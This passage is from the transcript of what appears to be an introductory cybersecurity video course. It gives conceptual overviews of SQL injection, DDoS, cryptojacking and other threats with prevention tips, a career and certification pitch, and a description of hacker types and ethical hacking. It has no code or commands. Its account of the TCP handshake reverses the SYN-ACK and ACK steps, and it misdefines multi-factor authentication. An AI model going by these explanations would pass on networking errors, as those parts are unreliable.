that you avoid using public Wi-Fis to carry out important work. Next attack that we will be talking about is the SQL injection attack. A structured query language, SQL injection, occurs in a database-driven website when the hacker manipulates a standard SQL query. This attack can be carried out by submitting a malicious code into a vulnerable website search box, thereby making the server reveal information. The outcome of this attack is that the attacker is able to view, edit, and delete tables in the databases. In addition to this, the attackers can also obtain administrative rights. An SQL attack manipulates data and accesses confidential information. In order to prevent a SQL injection attack, you should use an intrusion detection system. An IDS is designed to detect unauthorized access to a system. It is used together with a firewall and a router. This way, unwanted requests can be filtered out. The next step is to carry out a validation of the user-supplied data. There are codes that are developed to identify illegal user inputs. The validation process helps in verifying whether or not the type of user input is allowed or not. This way, only that value which passes the validation will be processed. That was all about the SQL injection attack. So now that we have reached midway, I'd like to remind y'all to feel free to leave your questions in our chat section and we will be happy to answer them. Without further ado, let's go back to our list of the top cybersecurity threats. At number 6, we have the denial of service attack. This is a type of attack that proves to be a major threat to companies. In this attack, malicious parties target systems, servers, or networks and then flood them with traffic so as to exhaust their resources and bandwidth. As a result, the server is unable to handle incoming requests and thereby resulting in the website it hosts to either slow down or shut down. This leaves legitimate service requests unattended. It is known as distributed denial of service, DDoS, when attackers use multiple compromised systems to launch this attack. Like I mentioned earlier, the DDoS attack is a major threat to organizations. Let's have a look at one such DDoS attack. In February 2018, the famous United States-based global company GitHub revealed that it was hit with the distributed denial of service attack, DDoS attack. This DDoS attack is considered to be the world's largest DDoS attack. As you might be aware, GitHub is a developer platform used by millions all over the world. Hence, it always has high traffic and usage. But this time, it wasn't just high traffic, but a whopping 1.35 terabits per second, sending packets at a rate of 126.9 million per second. These figures speak for itself. Fortunately, GitHub was running a DDoS protection service which was automatically alerted within 10 minutes of the start of the attack. This attack only took GitHub systems down for about 15 to 20 minutes. GitHub was able to stop the attack quickly only because it utilized a DDoS mitigation service that helped in detecting the attack and which further helped in quickly taking the necessary steps to minimize the impact. Let's now have a look at how to prevent a DDoS attack. Firstly, to stop a DDoS attack, you're required to identify the malicious traffic. This can be made possible by running a traffic analysis. Also, remember to comprehend the warning signs. Few symptoms of a DDoS attack include network slowdown, intermittent website shutdowns, etc. If anything seems irregular and unusual, then the organization should do the needful. Secondly, understand that every organization can face a DDoS attack and be ready with a prevention plan, as there won't be any time to prepare one when it hits. For this purpose, develop an incident response plan, have a checklist, and make sure your team and data center is prepared. If you are well prepared, you can tackle a DDoS attack smoothly like how GitHub did. Lastly, the conventional DDoS mitigation solutions oversize the network bandwidth and require complex hardware, which proves to be costly and also ineffective. Whereas cloud has greater bandwidth and resources. It is also to be noted that cloud-based apps can absorb malicious traffic way before it reaches its intended destination. Hence, it is good to outsource DDoS prevention to cloud-based service providers. That was all about the DDoS attack. Now, let's look at number 7, and here we have the insider threat. An insider threat, as the name suggests, is one that does not involve a third party but an insider. It could be someone from the organization who knows everything about the organization. It could be current employees, former employees, contractors, or even associates. These threats have the potential to cause huge damages. Researchers show that insider threats are growing in small businesses, as employees have access to multiple accounts that have a lot of data. The individuals who misuse this data can put everyone else at risk. Reasons for such security breaches are many. It can be due to malice, greed, or even carelessness. Such a threat is quite tricky as these attacks are hard to predict. In order to prevent the insider threat attack, thorough preparation is required. Organizations should make sure that they have a good culture of security awareness. Businesses can limit the IT resources a user can have access to depending on their job roles. This way, the damage, if caused, can be minimized. All the employees should be trained to identify insider threats, and this way, employees can understand when an attacker has manipulated or is attempting to misuse the company data. Next up in our list is cryptojacking, which is at number 8. I'm sure most of you are aware of the word cryptocurrency. Cryptojacking is related to cryptocurrency. You must be wondering how. Let's understand what is cryptojacking. Cryptojacking takes place when attackers make their way into someone else's computer to mine cryptocurrency. This is done by infecting a website or by manipulating the victim to click on a malicious link, which in turn loads crypto mining code on the computer. It is also done through online ads with JavaScript code that will auto-execute once loaded in the victim's browser. Victims are unaware of this as the crypto mining code works in the background. The only sign they might witness is a delay in the execution. Crypto mining is a form of obtaining cryptocurrency. Crypto mining by itself is an immense process. That is the reason attackers make use of other computers in order to crypto mine. Let's have a look at ways to prevent cryptojacking. It is advised that you keep all security apps and software updated to the latest versions, as cryptojacking can infect the most unprotected systems. It is also good to have a cryptojacking awareness training and give tips to employees as to how to detect cryptojacking threats. Make sure to inform them about the risks of opening emails from unknown senders and clicking on attachments. Ads are a primary source of cryptojacking scripts. Therefore, it's good to install an ad blocker and also have extensions like MinerBlock, which is used to detect and block crypto mining scripts. Moving on to the number 9 on our list, we have the zero-day exploit. A zero-day exploit occurs after the announcement of a network vulnerability. Usually, the vendor becomes aware of a vulnerability, but a solution to it is still not available for the same. Hence, the vendor announces the vulnerability so that the users are aware of it, but this also makes the attackers aware of it. The vendor or the developer could take any amount of time to find a solution. It could vary from a few hours to days to months, depending on the vulnerability. In the meantime, the attackers target the disclosed vulnerability. They exploit the vulnerability even before a patch or a solution is implemented. Speaking of ways to prevent zero-day exploit, organizations should have a well-communicated patch management process. It is also crucial to use management solutions to automate the procedures. Thus, it avoids delays in deployment. Having an incident response plan helps in dealing with a cyber attack. You need to have a plan primarily looking into zero-day attacks. In case of an attack, this plan will keep you prepared and will allow you to avoid or reduce the damage. Finally, at number 10, we have the watering hole attack. Generally, in a watering hole attack, the victim is of a specific group. It could be either victims of an organization or a region or so on. Here, the attacker targets the websites which are frequently used by the particular group. They identify these websites either by guesswork or by closely monitoring the group. After which, the attackers infect a few of these websites with malware, and anyone who happens to visit the infected website will have their computers automatically loaded with malware. This attack loads the victim's system with malware similar to the phishing attack. The malware in such an attack targets personal information of the victim. There is also a possibility that the hacker will actively take control of the infected computer. Let's have a look at how we can prevent the watering hole attack. Just like most other cyber attack prevention methods, in this attack as well, it is strongly suggested that you regularly update your software. By doing so, you can reduce the risk of this attack, as this attack most often exploits vulnerabilities. Also, make sure to regularly check for any security patches. Make use of your network security tools to detect watering hole attacks. Intrusion prevention systems work finely when it comes to detecting a suspicious act. Similarly, you can conduct regular security checks using various network security tools. To prevent a watering hole attack, it is good to conceal your online activities. This can be done with the help of a VPN and also through your browser's private browsing feature. A virtual private network, often called a VPN, provides a secure connection to another network over the internet. It acts as a cover to your browsing activity. NordVPN is an example of a VPN that can be used to provide a secure connection. So those were all about the different types of cyber threats. Cybersecurity is implemented in order to put a curb on these cyber attacks. Cybersecurity refers to the practice of protecting networks, computer systems, and their components from unauthorized digital access. According to the Gartner forecast worldwide, it is stated that the worldwide spending on cybersecurity is forecasted to reach $133.7 billion in 2022. And according to the University of Maryland, hackers attack every 39 seconds, that is, on an average, 2,244 times a day. Although we had a look at multiple methods to prevent a cyber attack, let's once again have a look at a few personal tips and ways in which you can prevent a cyber attack on the whole. Firstly, it is important you change your passwords regularly, and not only change but use strong passwords that are difficult to crack. Do not have extremely complicated passwords that you would tend to forget. Rather, use a password with at least 8 characters and preferably alphanumeric. Also, keep in mind not to use the same password twice. Next, update both your operating system and applications. This will remove vulnerabilities that hackers tend to exploit. Make use of antivirus protection software, as they prevent malware and other viruses from entering into your device. Use antivirus software from trusted and legitimate vendors only. Make sure to use a firewall, as it will filter the traffic entering your device. Use other network security tools such as intrusion prevention systems, access control, application security, and so on. Fourthly, as mentioned in the earlier section, don't open emails from unknown senders. Scrutinize the emails that you receive and see where it comes from and if there are any grammatical or format errors. Ideally, it is good to make use of a VPN. By doing so, the traffic is encrypted between the VPN server and your device. This proves to be a protection for your device. The next step is that you regularly back up your data. According to many security professionals, it is good to have 3 copies of your data on 2 different types of media and 1 copy in an off-site location like a cloud storage. This way, even if you witness a cyber attack, you can erase your systems and restore with a recently performed backup. Up next is that you should train your employees in cybersecurity principles. They should also be aware of the various cyber threats and know how to tackle them in case of any emergency. The next one is a crucial step, and that is to make sure to use 2-factor or multi-factor authentication. Normally, while logging in, you would enter your user ID and password. But with 2-factor authentication, users are required to provide 2 different authentication factors to verify themselves. It could be an additional personal identification code or maybe even a fingerprint. When you are asked for more than 2 additional authentication methods apart from your username and password, it is termed as a multi-factor authentication. Thus, it proves to be a better step to secure your account. Make sure to always secure your Wi-Fi networks. The next point is that refrain from using public Wi-Fi without using a virtual private network, that is a VPN. Finally, it is also necessary that you safeguard your mobile, as mobiles are also a cyber attack target. For this purpose, install apps from only trusted and legitimate sources. Make sure to keep your device updated. And there you go. Those were a few of the cybersecurity tips and ways to prevent a cyber attack. Let's start off with a few interesting facts about DDoS attacks. Cybercrime magazine stated that the total number of DDoS attacks globally are anticipated to double to 14.5 million by 2022. Now that's a huge number, isn't it? Also, given the current situation with the COVID-19 pandemic, every sector is operating virtually. Thus, the attacks are growing more significantly than normal. Do you know the financial brunt a DDoS attack causes? Once again, according to Cybercrime magazine, a denial of service or a DDoS attack could cost up to $120,000 for a small company or more than $2 million for a larger one. With financial loss, even reputation gets hampered. There are a few industries that are more susceptible to DDoS attacks, and according to the Cisco reports, the online gaming and the gambling industry are a prime target. Now let me talk about a few real-life DDoS attacks that have happened in the past. Our first example is the DDoS attack faced by Dyn. Dyn is an internet performance management and web application security company that was acquired by Oracle in 2016. On October 21, 2016, Dyn faced a serious distributed denial of service attacks that targeted systems operated by DNS provider Dyn. The DDoS attack lasted roughly for a day, with spikes coming and going up to 1.5 terabits per second. Reports state that attack was carried out using a weapon called the Mirai botnet. About 10% to 20% of all the 500,000 or so known Mirai bots were involved, in addition to other devices. The findings revealed that Mirai was the primary source of malicious attack traffic. The attack affected a large number of users in North America and Europe. Several large businesses with high traffic like Amazon, Quora, Airbnb, HBO, the New York Times, Twitter, Visa, and CNN were affected. Our next example is Amazon Web Services, a subsidiary of Amazon which works on providing on-demand cloud computing platforms. In the month of February 2020, Amazon stated that AWS Shield observed and mitigated a 2.3 terabits per second DDoS attack. AWS Shield, a managed DDoS protection service that is responsible for safeguarding applications running on AWS, mitigated this attack. The attack was carried out using hijacked CLDAP web servers and caused 3 days of elevated threat for its AWS Shield staff. The DDoS attack had a peak volume traffic of 2.3 terabits per second, which is the largest ever recorded. Detailing the attack in its Q1 2020 threat report, Amazon said its AWS Shield service mitigated the largest DDoS attack ever recorded, stopping a 2.3 terabits per second attack in mid-February this year. Now that we have seen a few real-life DDoS attacks, let's move on to understanding what exactly a DDoS attack is. You might have often come across the word denial of service attack, right? So is it the same as DDoS? Well, they differ with respect to a few parameters. A denial of service attack takes place when a computer is used to flood the target server or network with traffic. By doing so, its resources and bandwidth are exhausted. The motive of the attack is to deny normal legitimate service requests and user access. As you can see in this image, we have the attacker's computer sending traffic to the target server here. Now, let's speak a bit about the DDoS attack. A DDoS attack works closely like a denial of service attack. The only difference is that here, multiple systems are used to launch the attack. You can call DDoS attack as a large-scale attack operation based on a denial of service attack. DDoS stands for Distributed Denial of Service. Here, several systems target a single system with malicious traffic. When multiple systems are used, the attacker can put the system offline more easily. DDoS attack is faster than a normal denial of service attack, and DDoS attacks are difficult to trace. From this image, you can see that multiple systems are used to launch this attack. The systems together flood the target system with massive traffic. Now that we know what a DDoS attack is, let's try and understand the motive behind these attacks. The first reason can be guessed well by all of you, and that is for ransom. Just like any other cyber attack, the primary reason is monetary gain. A website owner can be asked to pay a ransom for attackers to stop a DDoS attack. The ransom prices to stop the DDoS attacks vary from small amounts to hefty amounts of money. In most cases, the ransom is usually charged in bitcoins. The second reason is hacktivism or protest. Hacktivism occurs with the intention of spreading a message. The aim of this is to usually protest against an ideology or a political agenda. The target of many hacktivism DDoS attacks are government, financial, or business websites. Attackers launch DDoS attacks to shut a website, say for a political reason, thus trying to make a statement. A person with a financial or an ideological motive is capable to damage an organization by launching a DDoS attack against it. Lastly, these attacks can be carried out for a specific reason, called targeted attacks. For example, it can be done to damage an organization's reputation. It is to be noted that DDoS attacks can be deployed against big or small sites and can be driven by either competition or pure boredom, or also for the need for challenge. The magnitude of these attacks can vary from small to big. Let's now move on and understand a little more about the working of a DDoS attack. An attacker is required to gain control of a network of online machines in order to carry out a DDoS attack. Computers and various other IoT devices are infected with malware, and these turn into a bot, also known as a zombie. A group of such bots is called a botnet. Once a botnet is created, the attacker takes over the remote control access. A DDoS is usually launched through a network of remotely controlled bots or hacked computers. Botnets can range from hundreds to thousands of computers controlled by hackers. It is possible that your computer could be a part of a botnet without even you knowing it. The next step is to target the IP address of the victim by the botnet. Once this is done, each bot will bombard the target with fake service requests. The botnets send more connection requests than a server can handle. In some cases, they send huge volumes of data that exceed the bandwidth range of the victim. By doing so, the targeted server or network will overflow and thus resulting in a denial of service to normal traffic. It is not possible to identify the bot as it looks like a legitimate internet device. A successful DDoS attack slows a website, prevents users from accessing it, resulting in financial losses and performance issues. So now that you know how a DDoS attack is carried out, let's have a look at the types of DDoS attacks. Different DDoS attack vectors target the different components of a network connection. DDoS attacks can be divided into three types. They are volume-based attacks, protocol attacks, and application layer attacks. Let's have a look at each one of these attacks. First up, we have the volume-based DDoS attack. As the name suggests, this attack depends on the volume of the inbound traffic to the target. This attack aims at overloading the website's bandwidth or causes usage issues. It creates a congestion by consuming all the available bandwidth. Here, massive volumes of data are sent to the victim by using a form of an application or request from a botnet. It is very simple. The more the volume, the higher the success rate of the attack. The volume-based DDoS attacks include UDP floods, ping, that is ICMP floods, and other spoofed packet floods. Now let's have a look at an example of the volume-based attack, that is the ping ICMP flood attack. The Internet Control Message Protocol ICMP, which is utilized in a ping flood attack, is an internet layer protocol used by network devices to communicate. An ICMP flood attack, also known as ping flood attack, is one of the most common denial of service attacks. Here the attacker overwhelms the target device with ICMP echo requests. Basically, ICMP echo request and echo reply messages are used to ping a network device to check the connection between the sender and the receiver. An ICMP request requires resources and bandwidth to process and reply to the requests. By flooding the target with request packets, the network is forced to respond with an equal number of reply packets, thus making it unserviceable to normal traffic. attackers would usually spoof in a bogus IP address in order to mask the sending device. The next type of DDoS attack we will be discussing about is the protocol-based attack. When you learn networking, you will know that the internet is based totally on a set of protocols. Protocol attacks cause a service disruption by consuming intermediate communication equipment like firewalls and load balancers. DDoS attacks based on protocols exploit weaknesses in Layer 3 and Layer 4 protocol stacks. Protocol-based attacks exploit your network by sending either more packets than what your server can manage or more bandwidth than what your network ports can hold. This attack includes SYN floods, ping of death, and Smurf DDoS to name a few. Here we will have a look at an example of the protocol-based attack, that is the SYN flood attack. Here the attack exploits the TCP handshake. In a regular TCP/IP network transaction, there is a three-way handshake, namely the SYN, the acknowledgement, and the SYN acknowledgement. The SYN is a service request. The ACK, that is also known as the acknowledgement, is a response from the target, and the SYN acknowledgement is the original requester replying with something like a thanks in return. Whereas in the SYN flood attack, the SYN packets are created with fake IP addresses by the attackers. The target, as per the protocol, then sends an acknowledgement to the dummy address. Unfortunately, this dummy address never responds. This is carried out a number of times. The target waits for the final step in the handshake, and in turn, it exhausts its resources in the process. Next up, we have the application layer attack. The main motive of this attack is to bring down an online service or a website. These attacks are comparatively smaller but silent. Application layer attacks are also known as Layer 7 attacks, and it not only targets the application but also the network and its bandwidth. Application layer attacks include GET and POST floods, low and slow attacks, and more. Let's have a look at the famous HTTP flood attack as an example. HTTP flood is a type of distributed denial of service attack in which the attacker exploits legitimate-looking HTTP GET or POST requests to attack a web server or an application. Here, large numbers of HTTP requests flood the server, resulting in denial of service. HTTP has generally two types of requests, GET or POST. A GET request is used to retrieve information, while a POST request is often used when submitting a completed web form or when uploading a file. Usually, HTTP flood attacks are harder to detect and block. A HTTP flood attack sends what appears to be legitimate HTTP GET or POST requests to attack a web server or an application. These flooding attacks often rely on a botnet. Now that we had a look at the types of DDoS attacks, let's understand the measures we need to take up in order to prevent these attacks. The first step is to acquire more bandwidth. You must make sure that you have ample bandwidth to handle any spikes in traffic caused due to malicious activity. Currently, with attackers being more careful, having more bandwidth raises the bar which the attackers have to overcome before launching a successful DDoS attack. This is a good preventive step. Next, make sure to develop a DDoS response plan ready. Usually, when a DDoS attack takes place, there is very less time to plan. Hence, it is wise to define a plan in advance as it will avoid and minimize any impacts. To do this job, first you would have to develop an incident response plan. Also, make sure your data center is prepared and your team knows what to do. The standard key elements include system checklist, forming a response team, which should include the list of internal and external contacts as well. And the last being securing your network infrastructure. This can be done with the help of IPS, that is intrusion prevention systems, which combine firewalls, VPN, load balancing, and other layers of DDoS defense techniques. Our third point is to configure network hardware against an attack. At times, small hardware configuration changes can help you prevent a DDoS attack. This is most often overlooked. Also, make sure to protect your DNS servers as attackers can bring down your website and web servers offline by attacking your DNS servers. Next point is to leverage the cloud. The conventional DDoS mitigation solutions oversize the network bandwidth and require complex hardware, which proves to be costly and also ineffective, whereas cloud has greater bandwidth and resources. Cloud-based apps can absorb malicious traffic way before it reaches its intended destination. Therefore, it is good to outsource DDoS prevention to cloud-based service providers. Our fifth point involves monitoring your website traffic regularly for unusual activities. It is a great thing if your website gets millions of new visitors in an hour, but isn't that also suspicious? A sudden increase in traffic is an alarming situation. Hence, have alerts set up in the event you exceed a threshold specific to the number of requests targeting your site. Considering the time and place of the inbound traffic is also a good step. A DDoS attack usually gives a few red flags before it happens. Your team should be wise enough to spot them beforehand. The signs of such an attack, for example, will be your website being unresponsive or responding slowly, intermittent website shutdowns, or probably the user having problems accessing the website. If these issues are prolonged, then the network is likely experiencing a DDoS and an action should be taken immediately. The next step is to keep everything up to date. This might sound basic, but it goes a long way. All the systems should be kept up to date to make sure that any issues or bugs are fixed. It is always good to detect threats at an early stage. Finally, you can make use of DDoS prevention tools like Imperva, Cloudflare, F5 Networks, Arbor DDoS, and Black Lotus to name a few. These tools are very effective. For example, Cloudflare's Layer 3 and 4 protection absorbs an attack before it reaches the target server. This is not achievable by using firewalls, load balancers, and routers. Taking an example of Arbor DDoS, it is to be noted that it can deal with large volumes of malicious traffic without disrupting the regular traffic. This software is used to mostly protect enterprise or web hosting services. Now let's have a look at something interesting. We will speak a bit about the digital attack map. As you see on your screens, it is a data visualization of DDoS attacks across the world. It is built through a collaboration between Google Ideas and Arbor Networks. You can have a look at it and explore the various features it has, like which part of the world and when a DDoS attack is happening. You can also get all the stats related to the attack. Digital Attack Map lets you learn about past trends and find reports of outages happening on a given day. Make sure to check this out. Now that you know all about a DDoS attack, and if you're interested in becoming a cybersecurity expert and want to work on designing security systems and prevent cyber attacks, then Simplilearn can help you achieve your dreams. Simplilearn provides a cybersecurity expert master's program with foundational, intermediate, and advanced security skills through leading certification courses, including Security Plus, CEH, CISM, CISSP, and CECSP. With the increasing number of job opportunities in the field of cybersecurity, this certification course will provide to be an advantage. There are no prerequisites for this program. However, knowledge of any programming language is recommended, but again, not mandatory.
Let's see, how do we become a cybersecurity expert? So, essentially, who is a cybersecurity expert? A cybersecurity expert is an individual employed by an organization to protect their infrastructure, right? So this person is responsible to identify potential flaws, identify what threats the organization faces, and then streamline or create or design or architect methodology which is going to protect all the assets that the organization has. So this is going to happen through a variety of techniques such as finding weaknesses, so vulnerability management, where you run vulnerability scanners, identify potential flaws in the organization's infrastructure. Could be applications, could be servers, could be desktops, could be operating systems, could be anything, could be network-based flaws as well. And then you're going to monitor these systems. You're going to look at the data flow that is going through the internet, through the network, through the intranet rather. And then you're going to check if there is anything malicious going on in that network. So over these techniques, you're basically going to monitor it on a day-to-day basis, on a regular basis, and you're going to try to identify if anything out of the ordinary is happening, right? After you find the weakness, you're going to test those weaknesses to identify the complexity of those weaknesses, to validate those weaknesses actually exist, and then you're going to repair them, you're going to patch them, you're going to install updates, or you're going to you're going to install mechanisms like firewalls or antiviruses to mitigate those weaknesses, and you're going thus resulting in strengthening the areas where an attack may have occurred. Let's see the domains in cybersecurity. Now, when we say domains in cybersecurity, in the previous slide we were discussing where these attacks may happen, like applications, infrastructure, network. So let's see these domains in details. Asset security. Now, when we say assets could be applications, could be networking devices, could be computers, could be routers, could be wireless access points. And these all these devices have their own operating systems, they have their own functionality, and it is important that we look at the security of each and every asset that the organization owns. Security architecture and engineering. Now, not everyone can just walk in an organization and then say, let's start implementing security in a particular manner. We have to standardize the security in such a way where the security is constant for a long period of time and is consistent, right? So for that to happen, there is an architecture, an engineering phase where we are going to create a plan of how this security needs to be implemented. For example, if I determine to install a particular antivirus, I have to ensure that the same antivirus is installed on all the systems in the organization. I cannot have different kind of antiviruses installed that do not talk to each other or do not report properly to the proper owner. So we have to create policies, procedures, and we have to implement them in a standardized manner for our security to work properly. Communication and network security. Now, with cloud computing coming in and hybrid clouds happening, where you got a deployment of a physical infrastructure talking to something that is on the cloud, let's say AWS or Microsoft Azure, right? And data flows are happening globally these days. You have to be very careful how these data are going to be transmitted across the network. Thus, you have to create those paths and ensure that those paths are monitored properly, are regulated properly, and do not have any data leakages. Similarly, identity and access management. Who is accessing my data? Are they authorized to access my data? And if yes, how am I going to authenticate them? How am I going to track them? How am I going to hold them accountable for whatever they have done? Even if a person is authorized to do something, we have to hold him accountable for that activity so that if something happens later on, we can identify who made that change. So the identity and access management module will consist of us creating groups, policies, users, roles, and interlinking them with the assets to ensure that only authorized people are able to access those devices. Security operations. On a day-to-day basis, we need to monitor the security of the organization. For example, if today I start facing a denial of service attack, or somebody starts a password attack on my organization where they're trying to crack somebody's password, there should be some internal mechanisms that are in place which will try to identify these attacks, warn the appropriate administrator, and that administrator will walk in and try to investigate that attack. So day-to-day operations are a must. Security assessment and testing. Now that we all have these mechanisms in place, are they going to remain constant for the rest of our lives? No. IT is an ever-evolving scenario. So we need to assess and test our security controls on a regular basis to ensure that there are no gaps left. What I configure today may be irrelevant tomorrow. So I have to constantly keep on looking at the latest security trends, the latest vulnerabilities that are being identified, the patches that are being installed, and I have to compare my infrastructure to all of these to see that I am compliant with the latest security standards. Software development security. So if you're an organization who's developing software and who's going to sell that software to end users, security becomes a huge part, because the end user or the buyer, if it is an organization, is going to ask what kind of security testing was done in that application. So that brings us to a software development life cycle, which talks about how you're going to create that code, how you're going to test that code, ensure that the code is secure enough. So you need to follow secure coding practices, and you're going to test the software over and over again till you're satisfied with the outcome. And then security and risk management. Now, when we come to risks are basically events that may occur compromising the security of an organization. So it is very important that we identify these risks, we map these risks, we verify how that risk is going to impact the business, and then try to figure out security controls to mitigate that risk or bring it down to manageable aspects. So that's a lot of talk, that's a lot of domains, that's a lot of attacks that we have discussed. Now let's see what kind of courses and certifications are available for us to enhance our careers and address all of these domains, all of these attacks. So starting off from a technical perspective, where we are going to look at ethical hacking or security, where we are going to assess and do a vulnerability assessment and penetration test. There are certifications from CompTIA like Security Plus or from EC Council, which is the Certified Ethical Hacking Training, which basically allows us to become vulnerability assessment and penetration testing experts. So we'll be technically be testing each and every device and trying to hack those devices to see if that vulnerability is real and what can be attained out of that vulnerability. CISSP is a very high level certification that normally is considered as a management level certification, right? So just to get certified yourself, you need at least 5 years of experience in the IT security field. This is where you get certified and you're basically a chief information security officer, where you're going to develop policies, procedures, and security control mechanisms, and you're going to standardize the security policy of the entire organization. Then you've got the CISA, or also known as the CISA, Certified Information Systems Auditor. It is from an organization called ISACA. It's more on the system side, where you're going to audit systems and you're going to verify that they are adhering to the policies that you have implemented. The CISM or SISM is the Certified Information Security Manager. This is again a project-based oriented approach where you're going to manage the security of an organization, and you're going to look at all the daily operations of the security operations center, and you're going to maintain and manage all of those functions overall. When we talked about risk assessment and risk strategy, for that we've got the CRISC, which is a Certified in Risk and Information Systems Control. Now, for these certifications, this is more on the business side of everything, where you understand the business processes, you understand the business requirements, and based on those business requirements, you compare the technical implementations of computing powers that you have implemented, and then you're going to compare how those technical aspects can be converted into a risk. For example, a vulnerability assessment identifies a possible SQL injection attack. Now, technically it becomes a big risk. However, which system is being affected? If that system gets compromised, what kind of losses is the organization looking at? How much are they going to be? What kind of losses the organization is looking at? Are they looking at lawsuits from their customers? Are they looking at penalties from regulatory authorities? So that risk, that implied risk that if this vulnerability is hacked, that is the aspect that you want to look at when you're looking at risk information and controls. Similarly, you have CCSP. This is a Certified Cloud Security Professional certification. So this is especially for people who want to deal with the cloud. Let it be a public cloud, a private cloud, or a hybrid cloud. This certification gives you an architectural overview over different aspects of cloud and how you want to implement security in a cloud-based scenario. So Simplilearn offers all of these certifications with trainings from certified professionals. So there's a master's program from Simplilearn which talks about becoming a cybersecurity expert, which includes all of these trainings. Once you have these kind of trainings and you get those certifications on your profile, that's where you're basically a cybersecurity expert, and you'll be designing and developing security policies, structures, architectures for various organizations and helping them enhance the security of their infrastructure.
We humans are highly tech savvy in the world.
So let's talk about hacking and what exactly hacking is. Hacking refers to exploiting weaknesses in a computer network to obtain unauthorized access to information. A hacker is a person who tries to hack into computer systems. Now here there are some keywords that we need to understand. First and foremost, exploit. When you're exploiting weaknesses are technically called vulnerabilities, which are basically design flaws, misconfiguration errors, usage of default usernames and passwords which have not been modified. So any misconfiguration or anything that has been left behind by a security administrator that can be misused, which means exploited by a hacker to gain unauthorized access. So the next term is unauthorized access, something that you're not allowed to do. And when you say a hacker is a person who tries to hack, it's basically a person with malicious intent trying to gain access to a system or a resource that they are not authorized to access in the first place. How do they do it? They find a vulnerability that is a weakness or a flaw, and then they misuse it to gain access to that particular network. So here in the diagram, you can see that the sender on the left hand side is trying to send some data to the receiver on the right hand side. The hacker would try to gain unauthorized access to the transmission that is being sent and would try to capture the data packets and read the secrets within. Let's look at a business case scenario into hacking. Now there is an organization, everybody is going around their own business when they realize that their systems may have been compromised. Now they're trying to look at the customer data to ensure that that has not been compromised and trying to assure the customers. However, they do realize that some customer data has been lost and even the company reports have been modified as well. Now this is the scenario where there have been some security controls in place and those controls have been identified. They realized that there is an attack that has happened, and based on that attack they have realized that their data has now been compromised and their records have been modified by the hacker, which means that the data is no longer trustworthy and thus cannot be used by the business for any legal transactions. So then the hacker gives a call to the organization or gets connected to the organization demanding a ransom for the data to be replaced, to be taken back into the original state where it was trusted, and thus the organization can utilize it for business transactions. The organization has probably no backup, so they decide that they want to pay the lump sum to the hacker to restore that data so that they can continue on with the business. Thus money exchanges and the hacker is able to restore that data and the business continues as usual. However, the activity here of a hacker trying to leverage the misconfiguration of the weaknesses in the organization's security, thus being able to hack them and make these ransomware demands. So the company then wants to figure out, even if having a security system in place, how was the hacker able to hack their systems? Thus, one of the employees comes up with a brilliant idea of identifying vulnerabilities in the network to proactively search for any flaws that have been left behind, so that they can plug those flaws and nobody can misuse them. Thus, they figure out that they want to hire an ethical hacker who would help them identify the security posture of the organization, identify the weaknesses, vulnerabilities and flaws, and help them remedy those flaws so that in future scenarios, these scenarios will not happen. So before we go into an ethical hacker, let's understand what are the types of hackers. So what are the types of hackers? Hacker is a technically skilled person who is very adept with computers. They have good programming skills, they understand how operating system works, they understand how networks work, they understand how to identify flaws and vulnerabilities within all of these aspects, and then they understand and know how to misuse these flaws to get a outcome which would be detrimental to the health of the organization. So there's 6 types of hackers that have been identified: black hat hackers, white hat hackers, grey hat, script kiddies, nation sponsored hackers, and hacktivists. So black hat hackers are basically the malicious hackers who have malicious intent and have criminalistic tendencies. They want to harm the organization by hacking into their infrastructure, by destroying their infrastructure, by destroying their data, so that they can gain from it from a monetary perspective. These guys are also known as crackers. The main aspect of these people are that they have malicious intent, they try to do unauthorized activities, and they try it for personal gain. Another important aspect to remember is that a black hat hacker will always try to hide their identity. They will spoof their online digital identity by masking it, by spoofing their IP addresses, MAC addresses, and try to remain anonymous on the network. A white hat hacker, on the other hand, is also an ethical hacker or a security analyst who's an individual who will do exactly the same thing that a black hat hacker would do, minus the malicious intent, plus the intent of helping the organization identifying the flaws and remedying them so that nobody else can misuse those vulnerabilities. So they are authorized to act on the company's behalf. They are authorized to do that activity which would help the company identify those flaws and thus help the company mitigate those flaws, improving on their security posture. So these kind of security experts or ethical hackers would help organizations defend themselves against unauthorized attacks. Grey hat hackers is a blend of both white hat and black hat hackers. So here they can work defensively and offensively both. They can accept contracts from organizations to increase their security posture. At the same time, they can also get themselves involved in malicious activities towards other organizations to personally gain or benefit from them by doing unauthorized activity. Script kiddies are people who are technically not much aware about what hacking is. They rely on existing tools that have been created by other hackers. They have no technical knowledge of what they're doing. It's just a hit or miss for them. So they just get their hands on a tool. They try to execute those tools. If the hack works, it works. Otherwise, it doesn't. So these people are basically who are noobs or newbies who are trying to learn hacking, or just people who with malicious intent who just want to have some fun or trying to impress people around. Then we have the nation or the state-sponsored hackers. As the name suggests, these hackers are sponsored by their government. Now, this may not be a legitimate job, but most of the governments do have hackers enrolled in their pay on their organizations to spy on their enemies, to spy on various countries and try to figure out the aspirations of those countries. So this is basically a spying activity where you're technically trying to get access to other countries' resources and then try to spy on them to figure out what their activities have been or what their future plans have been. And then we have the hacktivists, who is an individual who has a political agenda to promote, and they promote it by doing hacking. So these guys, what is the difference between a black hat hacker and a hacktivist? The black hat hacker may try to hide their identity. A hacktivist will claim responsibility of what they have done. So for them, it's a political agenda, a political cause, and they will try to hack various organizations to promote their cause. They would probably do this by defacing the website and posting the messages that they want to promote on these websites. So what exactly is ethical hacking then? We have discussed the types of hackers. We have identified a malicious hacker as a black hat hacker with the intent of doing harm to an organization's network for personal gain. We have discussed what the ethical hacker is. So an ethical hacker would be doing the same activity but in an authorized manner. So they would have legal contracts that they would be signing with the organization, which would give them a definite scope of what they are allowed to do and what they are not allowed to do. And the ethical hackers would function within those scopes, would try to execute those test scenarios where they would be able to identify those flaws or those system vulnerabilities, and then they would be submitting a report to the management of what they have found. They would also help the management to mitigate or to resolve those weaknesses so that nobody else can misuse them later on. They might use the same techniques and the same tools that black hat hackers do. However, the main difference here is that these guys are authorized to do that particular activity. They're doing it in a controlled manner with the intent of helping the organization and not with the intent of personal gains. So who's an ethical hacker? Again, an ethical hacker is a highly intelligent, highly educated person who knows how computers function, how programming languages work, how operating systems work. They can troubleshoot. They're technically very adept at computing. They understand the architecture. They understand how various components in a computer work. They can troubleshoot those components, and they can basically be very good with programming as well. Now, when I say programming, we don't want an ethical hacker to be a good developer of applications. We want them to understand programming in such a way that they can create scripts. They can write their own short programs like viruses, worms, trojans, or exploits which would help them achieve the objective that they have set out for. So here you can see the ethical hacker. They are individuals who perform a security assessment of their companies with the permission of concerned authorities. So what is a security assessment? A security 